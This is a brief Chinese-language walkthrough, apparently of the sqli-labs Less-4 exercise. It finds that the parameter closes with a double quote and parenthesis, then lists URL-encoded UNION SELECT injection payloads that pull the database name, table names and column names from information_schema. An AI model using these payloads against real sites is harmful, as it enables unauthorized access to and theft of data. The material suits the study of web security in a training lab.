首先来了解语句构造方法:
输入id=1’显示正确,输入id=1”显示错误(如下图),可以看到后面有个),说明这里跟前面less-3一样,也是用)来闭合,只不过这里从单引号变成了双引号
输入id=1”)--+成功执行(如下图),所以接下来我们就可以输入执行代码了
爆数据库:
id=-1")%20union%20select%201,2,database()--+
爆表
id=-1")%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)--+
爆字段
id=-1")%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1)--+
